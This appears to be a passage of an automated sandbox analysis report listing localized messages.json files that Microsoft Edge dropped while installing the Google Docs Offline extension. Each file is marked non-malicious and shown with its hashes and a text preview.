SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
